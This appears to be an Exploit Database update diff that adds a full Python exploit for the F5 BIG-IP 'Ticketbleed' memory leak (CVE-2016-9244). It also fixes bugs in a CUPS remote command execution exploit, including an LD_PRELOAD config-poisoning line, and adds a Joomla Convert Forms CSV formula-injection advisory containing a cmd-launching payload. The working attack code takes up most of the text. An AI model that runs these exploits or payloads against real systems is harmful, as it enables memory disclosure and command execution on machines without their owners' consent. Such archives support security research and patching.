DB: 2018-04-13

3 changes to exploits/shellcodes

F5 BIG-IP SSL Virtual Server - Memory Disclosure
F5 BIG-IP SSL Virtual Server - 'Ticketbleed' Memory Disclosure

F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure

Joomla Convert Forms version 2.0.3 -  Formula Injection (CSV Injection)

exploits/hardware/remote/44446.py

@@ -0,0 +1,152 @@
+# -*- coding: utf-8 -*-
+#!/usr/bin/python
+# Exploit Title: Ticketbleed
+# Google Dork: n/a
+# Date: Exploit: 02/13/17, Advisory Published: 02/09/17 
+# Exploit Author: @0x00string
+# Vendor Homepage: https://f5.com/
+# Software Link: https://support.f5.com/csp/article/K05121675
+# Version: see software link for versions
+# Tested on: F5 BIGIP 11.6
+# CVE : CVE-2016-9244
+# require: scapy_ssl_tls (https://github.com/tintinweb/scapy-ssl_tls)
+import re, getopt, sys, socket
+from struct import *
+try:
+    from scapy_ssl_tls.ssl_tls import *
+except ImportError:
+    from scapy.layers.ssl_tls import *
+
+def banner():
+    print '''
+            lol ty filippo!
+             ty tintinweb!
+             0000000000000
+          0000000000000000000   00
+       00000000000000000000000000000
+      0000000000000000000000000000000
+    000000000             0000000000
+   00000000               0000000000
+  0000000                000000000000
+ 0000000               000000000000000
+ 000000              000000000  000000
+0000000            000000000     000000
+000000            000000000      000000
+000000          000000000        000000
+000000         00000000          000000
+000000       000000000           000000
+0000000    000000000            0000000
+ 000000   000000000             000000
+ 0000000000000000              0000000
+  0000000000000               0000000
+   00000000000              00000000
+   00000000000            000000000
+  0000000000000000000000000000000
+   00000000000000000000000000000
+     000  0000000000000000000
+             0000000000000
+              @0x00string
+https://github.com/0x00string/oldays/blob/master/CVE-2016-9244.py
+'''
+
+def usage ():
+    print   ("python script.py <args>\n"
+            "   -h, --help:             Show this message\n"
+            "   -a, --rhost:            Target IP address\n"
+            "   -b, --rport:            Target port\n"
+            "\n\n"
+            "Examples:\n"
+            "python script.py -a 10.10.10.10 -b 443\n"
+            "python script.py --rhost 10.10.10.10 --rport 8443")
+    exit()
+
+def pretty (t, m):
+    if (t is "+"):
+            print "\x1b[32;1m[+]\x1b[0m\t" + m + "\n",
+    elif (t is "-"):
+            print "\x1b[31;1m[-]\x1b[0m\t" + m + "\n",
+    elif (t is "*"):
+            print "\x1b[34;1m[*]\x1b[0m\t" + m + "\n",
+    elif (t is "!"):
+            print "\x1b[33;1m[!]\x1b[0m\t" + m + "\n",
+
+def createDump (input):
+    d, b, h = '', [], []
+    u = list(input)
+    for e in u:
+            h.append(e.encode("hex"))
+            if e == '0x0':
+                    b.append('0')
+            elif 30 > ord(e) or ord(e) > 128:
+                    b.append('.')
+            elif 30 < ord(e) or ord(e) < 128:
+                    b.append(e)
+
+    i = 0
+    while i < len(h):
+            if (len(h) - i ) >= 16:
+                    d += ' '.join(h[i:i+16])
+                    d += "         "
+                    d += ' '.join(b[i:i+16])
+                    d += "\n"
+                    i = i + 16
+            else:
+                    d += ' '.join(h[i:(len(h) - 0 )])
+                    pad = len(' '.join(h[i:(len(h) - 0 )]))
+                    d += ' ' * (56 - pad)
+                    d += ' '.join(b[i:(len(h) - 0 )])
+                    d += "\n"
+                    i = i + len(h)
+    return d
+
+def ticketBleed (rhost, rport):
+    h = (rhost,int(rport));
+    version = TLSVersion.TLS_1_2
+    secret = ""
+    session_ticket = ""
+    sid = ""
+    cipher = TLSCipherSuite.ECDHE_RSA_WITH_AES_256_CBC_SHA
+    with TLSSocket(socket.socket(), client=True) as sock:
+        sock.connect(h)
+        ctx = sock.tls_ctx
+    	packet = TLSRecord() / TLSHandshake() / TLSClientHello(version=version, cipher_suites=TLS_CIPHER_SUITES.keys(), extensions=[TLSExtension() / TLSExtSessionTicketTLS(data="")])
+        sock.sendall(packet)
+        sock.recvall()
+    	packet_ke = TLSRecord(version=version) / TLSHandshake() / ctx.get_client_kex_data()
+        packet_ccs = TLSRecord(version=TLSVersion.TLS_1_2) / TLSChangeCipherSpec()
+        sock.sendall(TLS.from_records([packet_ke, packet_ccs]))
+        sock.sendall(to_raw(TLSFinished(), ctx))
+        ret = sock.recvall()
+        session_ticket = ret[TLSSessionTicket].ticket
+        secret = ctx.master_secret
+        #pretty("*", "ctx 1: \n" + str(ctx))
+    with TLSSocket(socket.socket(), client=True) as sock:
+        sock.connect(h)
+        ctx = sock.tls_ctx
+    	packet = TLSRecord() / TLSHandshake() / TLSClientHello(version=TLSVersion.TLS_1_2, cipher_suites=TLS_CIPHER_SUITES.keys(), session_id="A", extensions=[TLSExtension() / TLSExtSessionTicketTLS(data=session_ticket)])
+        sock.tls_ctx.resume_session(secret)
+        sock.sendall(packet)
+        ret = sock.recvall()
+        sid = ret[TLSServerHello].session_id
+        #pretty("*", "ctx 2: \n" + str(ctx))
+        pretty("+", "bled 'A' + 31 bytes: \n" + createDump(sid))
+
+def main():
+    rhost = None;
+    rport = None;
+    options, remainder = getopt.getopt(sys.argv[1:], 'a:b:h:', ['rhost=','rport=','help',])
+    for opt, arg in options:
+        if opt in ('-h', '--help'):
+            usage()
+        elif opt in ('-a','--rhost'):
+            rhost = arg;
+        elif opt in ('-b','--rport'):
+            rport = arg;
+    banner()
+    if rhost is None or rport is None:
+        usage()
+    ticketBleed(rhost,rport)
+    exit(0);
+
+if __name__ == "__main__":
+    main()

exploits/linux/remote/41233.py

@@ -40,7 +40,7 @@ def banner():
      000  0000000000000000000
              0000000000000
               @0x00string
-github.com/0x00string/oldays/CVE-2015-1158.py
+https://github.com/0x00string/oldays/blob/master/CVE-2015-1158.py
 '''
 
 def usage ():
@@ -140,10 +140,13 @@ def locatePrinters(rhost, rport="631"):
         if m is not None:
             printer = m.group(1)
             pretty("+","printer found: " + printer)
+            return printer
+        else:
+            pretty("-","no printers")
+            exit(1)
     else:
         pretty("-","no printers")
         exit(1)
-    return printer
 
 def preparePayload(libpath):
     with open(libpath, 'rb') as f:
@@ -226,7 +229,7 @@ def seedTarget(rhost, rport, printer, payload):
                         "\x0d\x0a")
 
     sendJobRequest = http_header2 + send_document_packet
-    blah2 = txrx("172.20.32.3",631,"tcp",sendJobRequest)
+    blah2 = txrx(rhost,int(rport),"tcp",sendJobRequest)
     pretty("*","\n" + createDump(blah) + "\n")
     pretty("*","job id: " + jobid)
     return jobid
@@ -478,13 +481,14 @@ def putConfig(rhost, rport, config):
     pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_request + config)))
 
 def poisonConfig(config, name):
-    config = config + "\x0a\x0aSetEnv LD_PRELOAD /var/spool/cups/d00" + name + "-001\x0a"
+    config = config + "\x0a\x0aSetEnv LD_PRELOAD /var/spool/cups/d000" + name + "-001\x0a"
     return config
 
 def main():
     rhost = None;
+    rport = None;
     noshell = None;
-    options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:f:h:', ['rhost=','rport=','lib=','stomp-only','help',])
+    options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh', ['rhost=','rport=','lib=','stomp-only','help'])
     for opt, arg in options:
         if opt in ('-h', '--help'):
             usage()

exploits/php/webapps/44447.txt

@@ -0,0 +1,30 @@
+# Exploit Title: Joomla Extension Convert Forms version 2.0.3 -  Formula Injection (CSV Injection)
+# Google Dork: N/A
+# Date: 12-04-2018
+################################
+# Exploit Author: Jetty Sairam
+################################
+# Software Link: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/forms/convert-forms/
+# Affected Version: 2.03 and before
+#Category: Plugins and Extensions
+# Tested on: WiN7_x64
+# CVE : CVE-2018-10063
+
+1. Application Description:
+ Convert Forms provides a framework to build custom forms for Joomla users.
+
+2. Technical Description:
+Custom Forms version 2.0.3 is affected by the vulnerability Remote Command Execution using CSV Injection. This allows a public user to inject commands as a part of form fields and when a user with higher privilege exports the form data in CSV opens the file on their machine, the command is executed.
+
+3. Proof Of Concept:
+Enter the payload @SUM(1+1)*cmd|' /C calc'!A0 in the form fields and submit.
+When high privileged user logs into the application to export form data in CSV and opens the file.
+Formula gets executed and calculator will get popped in his machine.
+
+4. Solution:
+Upgrade to version 2.0.4
+https://extensions.joomla.org/extensions/extension/contacts-and-feedback/forms/convert-forms/
+
+5. Reference:
+https://www.tassos.gr/blog/convert-forms-2-0-4-security-release
+https://vel.joomla.org/articles/2140-introducing-csv-injection

files_exploits.csv

@@ -16086,7 +16086,7 @@ id,file,description,date,author,type,platform,port
 41233,exploits/linux/remote/41233.py,"CUPS < 2.0.3 - Remote Command Execution",2017-02-03,@0x00string,remote,linux,
 41236,exploits/hardware/remote/41236.py,"Netwave IP Camera - Password Disclosure",2017-02-03,spiritnull,remote,hardware,
 41297,exploits/multiple/remote/41297.rb,"HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection (Metasploit)",2017-02-10,MaKyOtOx,remote,multiple,
-41298,exploits/hardware/remote/41298.txt,"F5 BIG-IP SSL Virtual Server - Memory Disclosure",2017-02-10,"Ege Balci",remote,hardware,
+41298,exploits/hardware/remote/41298.txt,"F5 BIG-IP SSL Virtual Server - 'Ticketbleed' Memory Disclosure",2017-02-10,"Ege Balci",remote,hardware,
 41358,exploits/php/remote/41358.rb,"Piwik 2.14.0/2.16.0/2.17.1/3.0.1 - Superuser Plugin Upload (Metasploit)",2017-02-14,Metasploit,remote,php,80
 41366,exploits/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",remote,java,
 41436,exploits/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Remote Buffer Overflow (SEH)",2017-02-22,"Peter Baris",remote,windows,
@@ -16389,6 +16389,7 @@ id,file,description,date,author,type,platform,port
 44376,exploits/windows/remote/44376.py,"Advantech WebAccess < 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow",2018-03-30,"Chris Lyne",remote,windows,4592
 44398,exploits/hardware/remote/44398.py,"Moxa AWK-3131A 1.4 < 1.7  - 'Username' OS Command Injection",2017-04-03,Talos,remote,hardware,
 44415,exploits/android/remote/44415.txt,"LineageOS 14.1 Blueborne - Remote Code Execution",2018-04-06,"Marcin Kozlowski",remote,android,
+44446,exploits/hardware/remote/44446.py,"F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure",2017-02-14,@0x00string,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39141,3 +39142,4 @@ id,file,description,date,author,type,platform,port
 44441,exploits/linux/webapps/44441.txt,"Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager - Invalid Access Control",2018-04-10,SlidingWindow,webapps,linux,
 44443,exploits/php/webapps/44443.txt,"WordPress Plugin File Upload 4.3.2 - Stored Cross-Site Scripting",2018-04-10,ManhNho,webapps,php,
 44444,exploits/php/webapps/44444.txt,"WordPress Plugin File Upload 4.3.3 - Stored Cross-Site Scripting (PoC)",2018-04-10,ManhNho,webapps,php,
+44447,exploits/php/webapps/44447.txt,"Joomla Convert Forms version 2.0.3 -  Formula Injection (CSV Injection)",2018-04-12,"Sairam Jetty",webapps,php,